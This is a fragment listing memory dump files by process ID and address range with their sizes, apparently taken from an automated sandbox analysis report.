                                                • memory/4988-301-0x00000000051B0000-0x0000000005A9B000-memory.dmp
                                                  Filesize

                                                  8.9MB

                                                • memory/4988-1-0x0000000004DA0000-0x00000000051A2000-memory.dmp
                                                  Filesize

                                                  4.0MB

                                                • memory/5068-817-0x00000000704D0000-0x0000000070820000-memory.dmp
                                                  Filesize

                                                  3.3MB

                                                • memory/5068-793-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB

                                                • memory/5068-795-0x0000000000E00000-0x0000000000E10000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/5068-794-0x0000000000E00000-0x0000000000E10000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/5068-816-0x0000000070480000-0x00000000704CB000-memory.dmp
                                                  Filesize

                                                  300KB

                                                • memory/5068-822-0x0000000000E00000-0x0000000000E10000-memory.dmp
                                                  Filesize

                                                  64KB

                                                • memory/5068-1031-0x0000000073750000-0x0000000073E3E000-memory.dmp
                                                  Filesize

                                                  6.9MB